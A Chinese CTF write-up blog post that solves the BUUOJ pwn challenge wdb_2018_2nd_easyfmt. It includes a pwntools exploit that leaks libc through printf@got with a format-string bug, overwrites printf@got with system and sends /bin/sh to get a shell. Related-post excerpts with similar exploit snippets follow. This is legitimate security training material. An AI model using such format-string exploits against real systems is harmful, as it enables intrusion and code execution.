wdb_2018_2nd_easyfmt

于 2023-09-30 16:48:40 发布
阅读量617 收藏
点赞数 20
分类专栏: Buuoj刷题 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62887641/article/details/133436526
版权

wdb_2018_2nd_easyfmt

Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x8047000)

32位只开了NX

这题get到一点小知识(看我exp就知道了

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  char buf; // [esp+8h] [ebp-70h]
  unsigned int v4; // [esp+6Ch] [ebp-Ch]

  v4 = __readgsdword(0x14u);
  setbuf(stdin, 0);
  setbuf(stdout, 0);
  setbuf(stderr, 0);
  puts("Do you know repeater?");
  while ( 1 )
  {
    read(0, &buf, 0x64u);
    printf(&buf);
    putchar(10);
  }
}

程序很简单,格式化字符串漏洞,并且无限使用

没有system函数

思路

泄露libc,用libc@system改掉printf@got,然后输入/bin/sh

libc=ELF('libc-2.23_32.so')
#from pwn import*
#from Yapack import *
r,elf=rec("node4.buuoj.cn",29463,"./pwn",10)
context(os='linux', arch='i386',log_level='debug')
#debug('b *0x80485ca')
#debug('b *$rebase(0x1373)')

pl=p32(elf.got['printf'])+b'%6$s'
sla(b'epeater?',pl)
leak = u32(r.recvuntil('\xf7')[-4:])-libc.sym['printf']
li(leak)
sys=system(leak)
pl=fmtstr_payload(6,{elf.got['printf']:sys})
sl(pl)
sl(b'/bin/sh\x00')

#debug()
ia()

一开始看栈里面没有合适的libc泄露
在这里插入图片描述

,我们从栈上面写got,泄露libc

在这里插入图片描述

,我们从栈上面写got,泄露libc

这样我们就有libc,就可以写libc@system了
在这里插入图片描述

YameMres
关注
  • 20
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
wdb_scraper
03-22
【标题】"wdb_scraper" 是一个针对Tutti.ch网站的数据抓取工具,它设计用于从该网站上高效地收集和整理信息。Tutti.ch是一个瑞士的在线市场,用户可以在这里查找各种服务、商品和活动。wdb_scraper帮助数据分析师、...
wdb_graphql
03-15
迷你挑战3-WDB @ FHNE BSc数据科学 作者:卢卡斯·雷伯(Lukas Reber) 使用Django和Graphene构建的GraphQL API。 Selenium Web Scraping脚本(在找到)使用该API来存储和更新数据库中的数据。 由于这只是概念的...
[BUUCTF-pwn]——wdb_2018_2nd_easyfmt
Y_peak的博客
03-17 636
[BUUCTF-pwn]——wdb_2018_2nd_easyfmt 一个简单的格式化字符串利用问题 泄露出got表地址,找到libc基地址 寻找system的实际地址 将printf_got修改为system的地址 写入”/bin/sh" exploit from pwn import * from LibcSearcher import * context.log_level = "debug" p = remote('node3.buuoj.cn',25125) #p = process("./
wdb_2018_2nd_easyfmt详解
像初雪一样自由洒落
04-25 1586
wdb_2018_2nd_easyfmt详解 自己做出来了,,,,还看其他人的 参考:wdb_2018_2nd_easyfmt 程序流程 程序流程非常简单,可以一直进行格式化字符串漏洞。 漏洞利用 首先通过格式化字符串泄露栈信息 通过格式化字符串修改printf_got表为system(one_gadget本地打通了,远程没有,,) 发送“/bin/sh\x00”, 详细过程 0.查看基本信息 32位程序,只开了nx winter@ubuntu:~/buu$ file wdb_2018_2nd_e.
buuoj刷题记录 - wdb_2018_2nd_easyfmt
qq_34010404的博客
03-26 251
程序很简单,while(1)反复利用fmt漏洞: 泄露libc地址: main函数是由__libc_start_main函数调用的,所以main执行时,ebp下面那个就是__libc_start_main中的地址,而__libc_start_main函数是位于libc中的,利用printf把返回地址打出来就可以泄露libc基址了. 之后便可以劫持got了,直接改printf为system得需要修改4个字节,打远程还是算了,这里提供另一种方法. 把printf的got改为某个gadget,这个gadge
WDB.zip_vxworks WDB组件_vxworks wdb_wdb
09-22
WDB,全称为Wind River Debug Bridge,是VxWorks系统中一个重要的组件,它提供了强大的远程调试功能,允许开发者在主机上对目标系统的VxWorks应用进行调试。 VxWorks WDB组件的核心功能包括: 1. **远程调试**:...
VCS.zip_VCS_synopsys vcs_vcs介绍
09-24
4. **查看结果**:利用波形查看器(如VCS的vcd2wdb转换工具配合 Mentor Graphics的ModelSim进行波形查看)分析仿真结果。 5. **覆盖率分析**:运行后收集覆盖率数据,使用`scover`或`dcov`工具进行覆盖率报告的生成...
KEY2_TEST.zip_altera_cyclone iV_firmware_quartus
09-21
你可能会找到.v(Verilog)、.vhd(VHDL)这样的源代码文件,.qsf(Quartus Settings File)定义项目设置,.sof(System Object File)是经过编译后的配置文件,还有可能包括仿真波形文件(.wdb)、测试激励文件(....
[BUUCTF]REVERSE——wdb_2018_2nd_easyfmt(32位格式化字符串修改got表)
mcmuyanga的博客
03-08 869
wdb_2018_2nd_easyfmt 附件 步骤 例行检查,32位程序,开启了nx 本地试运行一下,看看大概的情况,看交互式的情况,知道存在格式化字符串漏洞 32位ida载入 利用思路: 找到格式化字符的偏移量 打印print@got的地址,泄露libc,计算system的地址 将print@got修改成system,传入参数‘/bin/bash\x00’ 利用过程: 找到偏移为6 打印print@got的地址 printf_got=elf.got["printf"] payloa
BUUCTF(pwn)wdb_2018_2nd_easyfmt
半岛铁盒的博客
04-03 471
32位格式化字符串修改got表 做题思路 找到格式化字符的偏移量 打印print@got的地址,泄露libc,计算system的地址 将print@got修改成system,传入参数‘/bin/sh\0’ from pwn import* from LibcSearcher import* p=remote('node3.buuoj.cn',29087) elf=ELF('./1') printf_got=elf.got['printf'] payload1=p32(printf_got)+"%6$s"
BUUCTF pwn wp 81 - 85
fa1c4的blog
01-08 2886
wdb_2018_2nd_easyfmt int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { char buf[100]; // [esp+8h] [ebp-70h] BYREF unsigned int v4; // [esp+6Ch] [ebp-Ch] v4 = __readgsdword(0x14u); setbuf(stdin, 0); setbuf(stdout, 0);
wdb_2018_4th_pwn2(爆破随机数为0)
seaaseesa的博客
07-24 671
wdb_2018_4th_pwn2(爆破随机数为0) 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,功能1栈溢出,但是有canary 功能3格式化字符串,当仅能泄露一个值。 功能2是一个递归调用,多次递归,可以在栈里多处位置留下canary的值 功能9011也是一个栈溢出,但是需要正确的key才能进行。 可以使用功能3泄露libc地址,然后功能2递归多次,再使用功能1将canary的值泄露,最后通过爆破随机数,用9011功能来进行栈溢出做ROP。 随机数可以直接
2018网(PWN)鼎杯第一场解题记录(Writeup)
热门推荐
SWEET0SWAT的博客
08-21 1万+
MISC   clip     使用十六进制查看软件打开,查找的过程中发现有idat头:       还有一处在下方,表示还有另一张图片      但是这里缺少头部需要手动补充上去再另存文件:      一共提取出两张图片,但是图片明显被处理过了         其实不明白出题人为什么要弄成这样,CTF比赛还要弄成这样纯粹就是刁难,弄得眼睛贼疼。   minified...
buuctf (网鼎杯)wdb_2018_3rd_pesp realloc_hook, unlink,写入bss段3种方法记录
carol2358的博客
05-14 1265
写了一道2018网鼎的heap,漏洞挺多,尝试了3中方法解题,也算是对目前heap的学习进度的总结吧 题目本身是一道常规heap题,pie和got保护都没开,可以改写got表 ①realloc_hook的做法: 先贴exp,然后慢慢解释 exp: from pwn import * from LibcSearcher import * local_file = './wdb_2018_3rd_pesp' local_libc = '/lib/x86_64-linux-gnu/libc-2.23
wdb_2018_1st_blind(劫持bss段上的stdout指针来执行任意函数)
seaaseesa的博客
06-10 999
wdb_2018_1st_blind(劫持bss段上的stdout指针来执行任意函数) 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,程序里没有show功能 有一个后门函数 Delete功能存在UAF,但是delete功能只能用3次,因此劫持_IO_2_1_stdout来泄露libc地址次数不够用。 由于got表也不可写,那么我们可以劫持bss段上的stdout指针,将其指向我们伪造的_IO_FILE结构体处,就可以调用backdoor函数了。 #coding:ut
怎么把vivao2018.2波形生成的WDB文件导出来
最新发布
03-29
要将Vivado 2018.2波形生成的WDB文件导出,请按照以下步骤进行操作: 1. 在Vivado中打开波形文件。 2. 点击“File”菜单并选择“Write Waveform Data”。 3. 在弹出的“Write Waveform Data File”对话框中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值